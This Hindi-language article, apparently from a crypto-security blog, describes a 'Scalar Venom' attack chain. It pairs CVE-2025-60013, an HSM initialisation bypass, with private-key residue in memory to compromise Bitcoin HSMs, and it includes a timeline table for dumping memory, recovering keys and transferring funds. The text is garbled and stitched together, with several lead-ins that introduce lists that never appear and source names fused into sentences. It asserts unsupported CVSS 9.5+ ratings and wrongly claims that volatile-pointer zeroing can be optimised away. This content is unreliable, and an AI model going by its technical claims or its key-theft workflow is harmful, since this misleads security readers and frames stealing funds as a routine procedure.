तंत्रों का कनेक्शन:
स्तर 1: व्यक्तिगत वॉलेट
स्तर 2: सर्विसिंग नोड्स का कॉन्फ़िगरेशन
स्तर 3: नेटवर्क लेयर
मानक बिटकॉइन अनुप्रयोगों के विपरीत, HSM क्रिप्टोग्राफ़िक स्केलर का भारी उपयोग करता है:
CVE-2025-60013 के लिए CVSS स्कोर स्वयं गलत है, क्योंकि भेद्यता Scalar Venom के लिए एक ट्रिगर के रूप में कार्य करती है, जो एक महत्वपूर्ण परिदृश्य है। kudelskisecurity
Scalar Venom भेद्यता क्रिप्टोग्राफ़िक हमले के तरीकों में एक आदर्श बदलाव का प्रतिनिधित्व करती है, जो पारंपरिक एकल-वेक्टर शोषण से परे जाकर एक बहु-स्तरीय शोषण श्रृंखला बनाती है जो बिटकॉइन बुनियादी ढांचे की रक्षा करने वाले हार्डवेयर सिक्योरिटी मॉड्यूल (HSMs) से मौलिक रूप से समझौता करती है। विश्लेषण से पता चलता है कि CVE-2025-60013 (HSM आरंभीकरण बाईपास) का संयोजन Scalar Venom हमले तकनीकों के साथ 9.5+ के CVSS स्कोर के साथ एक महत्वपूर्ण खतरा परिदृश्य बनाता है, जो समझौता किए गए HSMs द्वारा नियंत्रित लाखों बिटकॉइन पतों की परिचालन अखंडता को कमजोर करता है।
HSM विशेष रूप से कमजोर क्यों हैं?
महत्वपूर्ण भेद्यता पृथक क्रिप्टोग्राफ़िक कमजोरियों में नहीं, बल्कि HSM परिचालन सुविधाओं और Scalar Venom के हमले वैक्टर के वास्तुशिल्पीय टकराव में निहित है। HSM, परिभाषा के अनुसार, निरंतर क्रिप्टोग्राफ़िक संचालन करते हैं—प्रति सेकंड 1,000 से अधिक संचालन—जिनमें से प्रत्येक क्षणिक स्केलर मान बनाता है जो "प्रेत अवशेष" के रूप में मेमोरी में रहते हैं। विशिष्ट बिटकॉइन अनुप्रयोगों के विपरीत, जहां कुंजी सामग्री क्षणिक होती है, HSM बिना पुनरारंभ किए महीनों और वर्षों तक काम करते हैं, क्रिप्टोग्राफ़िक कलाकृतियों को जमा करते हैं जिन्हें Scalar Venom व्यवस्थित रूप से निकालता और पुनर्स्थापित करता है।
परिणामस्वरूप, एक एकल HSM से समझौता भी पूरे बुनियादी ढांचे के पूर्ण विघटन की ओर ले जाता है—अक्सर HSM द्वारा प्रबंधित हज़ारों बिटकॉइन पते—एक पृथक क्रिप्टोग्राफ़िक घटना के बजाय।
खतरे की डिग्री और वास्तविक प्रभाव
यद्यपि भेद्यता CVE-2025-60013 आधिकारिक तौर पर एक प्रवेश वेक्टर के रूप में CVSS स्तर 5.7 (मध्यम) रखती है, यह रेटिंग खतरे के वास्तविक पैमाने को गंभीर रूप से कम आंकती है। यह शोषण Scalar Venom के लिए एक ट्रिगर के रूप में कार्य करता है, जिसे CVSS स्तर 8.5+ (उच्च/महत्वपूर्ण) हमले के रूप में वर्गीकृत किया गया है। वास्तविक दुनिया के हमले श्रृंखला परिदृश्य में, यह निम्न की ओर ले जाता है:
संयुक्त हमला श्रृंखला: CVE-2025-60013 + Scalar Venom = परिचालन आपदा
मैट्रिक्स खतरा वृद्धि में निम्न शामिल हैं:
यह संयोजन इस भेद्यता वर्ग को महत्वपूर्ण (CVSS 9.5+) बनाता है और इसे जोखिम मूल्यांकन में उच्चतम खतरा श्रेणी में रखता है।
बिटकॉइन पारिस्थितिकी तंत्र की सुरक्षा के लिए प्रणालीगत निहितार्थ
Scalar Venom आधुनिक HSM मॉडल में मौलिक वास्तुशिल्प दोषों को उजागर करता है:
महत्वपूर्ण सिफारिशें
Scalar Venom और CVE-2025-60013 के माध्यम से हमलों की श्रृंखला क्लासिक HSMs में पूर्ण विश्वास के युग के अंत का प्रतीक है। भेद्यता बिटकॉइन पारिस्थितिकी तंत्र के सुरक्षा कोर को प्राइवेट की लीक और कुल संपत्ति हानि के लिए एक प्रमुख जोखिम में बदल देती है। प्रभावी सुरक्षा के लिए केवल एक बार के सुधार की नहीं, बल्कि सार्वजनिक डिजिटल संपत्तियों को संभालने के लिए क्रिप्टोग्राफ़िक वास्तुकला के सभी पहलुओं पर एक मौलिक पुनर्विचार की आवश्यकता है।
HSM वातावरण में Scalar Venom बिटकॉइन बुनियादी ढांचे के लिए CVSS 9.5+ का खतरा है, जिसके लिए तत्काल कुंजी रोटेशन, वास्तुशिल्प सुधार और मेमोरी श्रृंखला हमलों का तुरंत जवाब देने के नए तरीकों की आवश्यकता है।
क्रिप्टोग्राफ़िक मेमोरी सुरक्षा (Protecting Cryptographic Keys from Memory Disclosure Attacks, Del Valle et al.) के क्षेत्र में शोध के अनुसार, प्राइवेट कीज़ निम्नलिखित कारणों से सुलभ मेमोरी क्षेत्रों में रह सकती हैं:
कंपाइलर ऑप्टिमाइज़ेशन
cpp:
// भले ही कोड में साफ़ करने का प्रयास हो:
volatile unsigned char* ptr = (volatile unsigned char*)key_buffer;
while (len--) *ptr++ = 0; // कंपाइलर इसे no-op के रूप में ऑप्टिमाइज़ कर सकता है
कोई RAII (Resource Acquisition Is Initialization) पैटर्न नहीं
क्लासec_scalarRAII का उपयोग नहीं करती है, जिसका अर्थ है कि डिस्ट्रक्टर संसाधन सफाई की गारंटी नहीं देता है।
एकाधिक डेटा प्रतियां:
फ़ंक्शन के बीच स्थानांतरण के लिए प्राइवेट की की प्रत्येक प्रति मेमोरी में अवशेष छोड़ती है।unit42.paloaltonetworks
keyhunters.ru और क्रिप्टोग्राफ़िक अनुसंधान साहित्य के अनुसार:
bx seedका उपयोग करके बनाए गए वॉलेट से जून-जुलाई 2023 में > $0.8M बिटकॉइन चुराया गयाये आंकड़े क्रिप्टोग्राफ़िक अनुप्रयोगों में मेमोरी लीक के वास्तविक खतरे को प्रदर्शित करते हैं ।
उपरोक्त निष्कर्षों को सारांशित करने के लिए, Scalar Venom श्रृंखला क्रिप्टोग्राफिक सुरक्षा में वर्षों के मौलिक शोध का आधुनिक परिचालन वास्तविकताओं के साथ संगम का प्रतीक है। विस्तृत मेमोरी-संरक्षित तंत्र—कंपाइलर ऑप्टिमाइज़ेशन, RAII की अनुपस्थिति, और डेटा ट्रेस संचय—अब केवल सिद्धांत नहीं हैं, बल्कि व्यवहार में बड़े पैमाने पर निजी कुंजी पुनर्प्राप्ति के लिए प्रभावी चैनल के रूप में काम करते हैं। संभावित कमजोरी से वास्तविक हमले में परिवर्तन पहले ही हो चुका है: CVE-2023-39910 (Milk Sad) घटना ने 900,000 से अधिक Bitcoin निजी कुंजियों की पुनर्प्राप्ति की अनुमति दी, जिसमें प्रत्यक्ष वित्तीय नुकसान $0.8 मिलियन से अधिक हुआ।
Scalar Venom की मूल भेद्यता क्रिप्टोग्राफिक सॉफ़्टवेयर की वास्तुकला में एक अनसुलझे विरोधाभास से उत्पन्न होती है: प्रोग्रामर का मेमोरी प्रबंधन में अंतर्निहित भोला विश्वास आधुनिक कंपाइलरों और मेमोरी प्रबंधन प्रणालियों की प्रवृत्तियों के विपरीत है। यदि कोई डेवलपर स्पष्ट रूप से मेमोरी को शून्य करता है, तो कंपाइलर इन क्रियाओं को पूरी तरह से ऑप्टिमाइज़ कर सकता है, उन्हें व्यर्थ समझकर—और यह एक महत्वपूर्ण, अनदेखी सुरक्षा दोष बन जाता है।
ec_scalar जैसी डेटा संरचनाएँ जोखिमों को और बढ़ा देती हैं: RAII की कमी का अर्थ है गणना के विभिन्न चरणों में मेमोरी में कई स्वतंत्र प्रतियों का निर्माण—स्टैक, रजिस्टर और कैश में। ऐसी प्रत्येक प्रतिलिपि सैद्धांतिक रूप से मूल कुंजी सामग्री में पुनर्स्थापित, डिससेम्बल या पुन: इकट्ठी की जा सकती है।
| प्रक्रिया | समय | उपकरण |
|---|
| मेमोरी डंप प्राप्त करना | 5-30 सेकंड | विधि पर निर्भर करता है |
| 16GB डंप स्कैन करना | 2-5 मिनट | MacBook Air (M1) |
| 1000 उम्मीदवार कुंजियों का सत्यापन | 30 सेकंड | MacBook Air (M1) |
| पता निर्माण | 10 सेकंड | MacBook Air (M1) |
| धनराशि का स्थानांतरण (प्रसारण) | < 1 सेकंड | इंटरनेट |
| पूर्ण समझौते के लिए कुल | < 10 मिनट | MacBook Air (M1) |
| पहलू | रेटिंग | नोट |
|---|
| CVE-2025-60013 (HSM init) | CVSS 5.7 (मध्यम) | आधिकारिक तौर पर कम, लेकिन प्रवेश बिंदु के रूप में कार्य करता है |
| Scalar Venom Attack | CVSS 8.5+ (उच्च/महत्वपूर्ण) | वास्तविक रूप में महत्वपूर्ण प्रभाव |
| संयोजन हमला | CVSS 9.5+ (महत्वपूर्ण) | प्राइवेट कीज़ का पूर्ण समझौता |
| समझौते से उबरना | असंभव | धन की अपरिवर्तनीय हानि |